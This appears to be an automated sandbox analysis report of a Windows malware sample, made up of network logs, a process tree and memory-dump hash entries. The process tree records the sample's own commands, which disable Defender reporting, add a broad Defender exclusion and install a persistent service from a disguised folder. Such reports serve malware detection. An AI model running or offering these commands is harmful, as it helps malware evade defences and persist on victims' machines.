Jan 5, 2025 17:49:43.648171902 CET | 192.168.2.5 | 1.1.1.1 | 0xe25f | Standard query (0) | reseed.i2pgit.org | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:51:00.264415979 CET | 192.168.2.5 | 1.1.1.1 | 0x12ec | Standard query (0) | reseed.onion.im | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 17:49:12.673886061 CET | 1.1.1.1 | 192.168.2.5 | 0xef5b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:49:12.673886061 CET | 1.1.1.1 | 192.168.2.5 | 0xef5b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:49:40.067955971 CET | 1.1.1.1 | 192.168.2.5 | 0x7907 | No error (0) | reseed.memcpy.io | | 95.216.2.172 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:49:41.570261002 CET | 1.1.1.1 | 192.168.2.5 | 0xe213 | No error (0) | reseed-pl.i2pd.xyz | | 185.226.181.238 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:49:43.684139013 CET | 1.1.1.1 | 192.168.2.5 | 0xe25f | No error (0) | reseed.i2pgit.org | | 68.183.196.133 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:51:00.291112900 CET | 1.1.1.1 | 192.168.2.5 | 0x12ec | No error (0) | reseed.onion.im | | 159.223.194.171 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49856 | 95.216.2.172 | 443 | 6524 | C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:49:40 UTC | 102 | OUT | GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0
User-Agent: Wget/1.11.4
Connection: close
2025-01-05 16:49:41 UTC | 247 | IN | HTTP/1.0 200 OK
content-disposition: attachment; filename=i2pseeds.su3
content-length: 69595
content-type: application/octet-stream
x-ratelimit-limit: 4
x-ratelimit-remaining: 3
x-ratelimit-reset: 900
date: Sun, 05 Jan 2025 16:49:40 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49867 | 185.226.181.238 | 443 | 6524 | C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:49:42 UTC | 104 | OUT | GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0
User-Agent: Wget/1.11.4
Connection: close
2025-01-05 16:49:42 UTC | 160 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 05 Jan 2025 16:49:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49876 | 185.226.181.238 | 443 | 6524 | C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:49:43 UTC | 104 | OUT | GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0
User-Agent: Wget/1.11.4
Connection: close
2025-01-05 16:49:43 UTC | 160 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 05 Jan 2025 16:49:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49885 | 68.183.196.133 | 443 | 6524 | C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:49:44 UTC | 103 | OUT | GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0
User-Agent: Wget/1.11.4
Connection: close
2025-01-05 16:49:44 UTC | 288 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 05 Jan 2025 16:49:44 GMT
Content-Type: application/octet-stream
Content-Length: 64742
Connection: close
Content-Disposition: attachment; filename=i2pseeds.su3
X-Ratelimit-Limit: 4
X-Ratelimit-Remaining: 3
X-Ratelimit-Reset: 900


                                                                                                                                                Target ID:0
                                                                                                                                                Start time:11:48:53
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\Desktop\cZO.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:4'528'128 bytes
                                                                                                                                                MD5 hash:BE6E88537235FF3B6B61DE70DFEECB3B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:11:48:54
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:4'528'128 bytes
                                                                                                                                                MD5 hash:BE6E88537235FF3B6B61DE70DFEECB3B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:11:48:57
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
                                                                                                                                                Imagebase:0x7ff7e6bf0000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:11:48:57
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:11:48:58
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:11:48:59
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe"
                                                                                                                                                Imagebase:0x7ff775720000
                                                                                                                                                File size:98'304 bytes
                                                                                                                                                MD5 hash:319865D78CC8DF6270E27521B8182BFF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:11:49:01
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:11:49:03
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:11:49:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe"
                                                                                                                                                Imagebase:0x7ff76a370000
                                                                                                                                                File size:10'669'056 bytes
                                                                                                                                                MD5 hash:2F829F1CB631D234C54F2E6C6F72EB57
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                                                                                                                                Imagebase:0x7ff6dddf0000
                                                                                                                                                File size:101'376 bytes
                                                                                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe stop RDP-Controller
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe start RDP-Controller
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Imagebase:0x7ff6be030000
                                                                                                                                                File size:89'088 bytes
                                                                                                                                                MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\icacls.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                                                                                                                                Imagebase:0x7ff7e8710000
                                                                                                                                                File size:39'424 bytes
                                                                                                                                                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\icacls.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                                                                                                                                                Imagebase:0x7ff7e8710000
                                                                                                                                                File size:39'424 bytes
                                                                                                                                                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:11:50:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:11:50:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
                                                                                                                                                Imagebase:0x7ff6f3c80000
                                                                                                                                                File size:570'736 bytes
                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:11:50:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
                                                                                                                                                Imagebase:0x7ff6f3c80000
                                                                                                                                                File size:570'736 bytes
                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:11:50:35
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:11:50:59
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Imagebase:0x7ff6be030000
                                                                                                                                                File size:89'088 bytes
                                                                                                                                                MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                  APIs
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DA053
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DA059
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DA05F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                  APIs
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DD0EB
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DD0F1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _clrfp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3618594692-0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                                                                                                                                                  • Instruction ID: 94151202dd1031304a6f7d83c6b5e153e51c36033d666cd4e8910bad687a67ae
                                                                                                                                                  • Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                                                                                                                                                  • Instruction Fuzzy Hash: 7B61087091CB5C4FEF28EF68984917ABBE5FB95721F00465FE487C3255DB70A8428AC2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                                                                                                                                                  • Instruction ID: 0061ef829e87c82a0d9c2b3a97faa44e36fddc2267b0cf17796596f338105e6f
                                                                                                                                                  • Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                                                                                                                                                  • Instruction Fuzzy Hash: 9F51E432718E0C4F9B1CDF6CD49867673D2EBAC315315822EE40BD72A5DA70D8468785
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                                                                                                  • Instruction ID: 71086d250f1f2ba5fdf0473999e0b70f2c48b4913439d22f63300f2ec25f5760
                                                                                                                                                  • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                                                                                                  • Instruction Fuzzy Hash: A12186317116054BE70CCE2EC899575B3D6F7D9205B54C67DD15BCB357C93658038A08
                                                                                                                                                  Memory Dump Source
